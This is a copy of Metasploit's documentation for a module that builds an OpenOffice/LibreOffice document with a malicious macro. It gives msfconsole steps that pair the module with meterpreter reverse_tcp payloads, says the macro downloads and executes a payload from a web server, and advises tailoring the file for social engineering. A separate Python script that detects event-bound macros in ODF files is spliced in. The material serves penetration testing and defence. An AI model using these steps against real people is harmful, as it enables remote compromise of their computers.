GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/misc/openoffice_document_macro.md

Vulnerable Application

This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also works against LibreOffice.

To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning.

  • Apache OpenOffice

  • LibreOffice
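
A triage check for the kind of macro-bearing document described above, added here as an example and not taken from the Metasploit module or its documentation: it flags ODF packages that carry Basic macro modules bound to a document event. It assumes the standard ODF package layout (macro modules under `Basic/`, bindings as `script:event-listener` elements in `content.xml`); `scan_odf`, `build_sample` and the sample package contents are constructed for illustration.

```python
import io
import re
import zipfile

# Assumed ODF layout: Basic libraries live under "Basic/", and event bindings
# appear as <script:event-listener> elements in content.xml.
LISTENER_RE = re.compile(rb"<script:event-listener\b[^>]*>")
ATTR_RE = re.compile(rb'(script:event-name|xlink:href)="([^"]*)"')


def scan_odf(data: bytes) -> dict:
    """Report embedded Basic modules and event-bound scripts in an ODF package."""
    report = {"macro_modules": [], "event_bindings": [], "suspicious": False}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = pkg.namelist()
        # script-lb.xml / script-lc.xml are library indexes, not macro modules.
        report["macro_modules"] = sorted(
            n for n in names
            if n.startswith("Basic/") and n.endswith(".xml")
            and not n.rsplit("/", 1)[-1].startswith("script-l")
        )
        if "content.xml" in names:
            content = pkg.read("content.xml")
            for tag in LISTENER_RE.findall(content):
                attrs = {k.decode(): v.decode() for k, v in ATTR_RE.findall(tag)}
                report["event_bindings"].append(
                    (attrs.get("script:event-name", ""), attrs.get("xlink:href", "")))
    # A macro wired to an event is what runs without the user invoking it.
    report["suspicious"] = bool(report["macro_modules"] and report["event_bindings"])
    return report


def build_sample(with_macro: bool) -> bytes:
    """Constructed, non-functional sample package used only to exercise scan_odf."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        listener = ""
        if with_macro:
            z.writestr("Basic/Standard/Module1.xml", "<!-- placeholder module -->")
            z.writestr("Basic/script-lc.xml", "<!-- library index -->")
            listener = ('<script:event-listener script:event-name="dom:load" '
                        'xlink:href="vnd.sun.star.script:Standard.Module1.Main'
                        '?language=Basic&amp;location=document"/>')
        z.writestr("content.xml", f"<office:document-content>{listener}</office:document-content>")
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_odf(build_sample(True)))
```

A hit from this check is a reason to keep Macro Security above Medium for that file and to inspect the listed modules before anyone opens it.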

Verification Steps

To use this exploit, you must know the platform of the targeted user. The module supports Windows, Linux, and OSX. If the target is using Windows, the exploit generates the macro with malicious PowerShell code inside. For the other supported platforms, the exploit generates Python code.

An example of using this module against Windows:

  1. Start msfconsole

  2. use exploit/multi/misc/openoffice_document_macro

  3. set target 0

  4. set payload windows/meterpreter/reverse_tcp

  5. exploit

An example of using this module against Linux or OSX:

  1. Start msfconsole

  2. use exploit/multi/misc/openoffice_document_macro

  3. set target 1

  4. set payload python/meterpreter/reverse_tcp

  5. exploit

Once started, the module will mainly do these things:

  1. It will start a payload handler.

  2. It will start a web server. This is used for the macro to download and execute our final payload.

  3. It will generate the malicious odt file. Send this to your targeted user.

Options

BODY

This option can be used to insert text into the malicious document.

Scenarios

openoffice_macro_demo

Modification

Since social engineering will play a big part in the success of the attack, you will most likely want to modify the odt file.

  1. To do so, first use msfconsole to generate the malicious odt file.

  2. Move the odt file to a system that has OpenOffice or LibreOffice.

  3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro code unless you actually know what you're doing.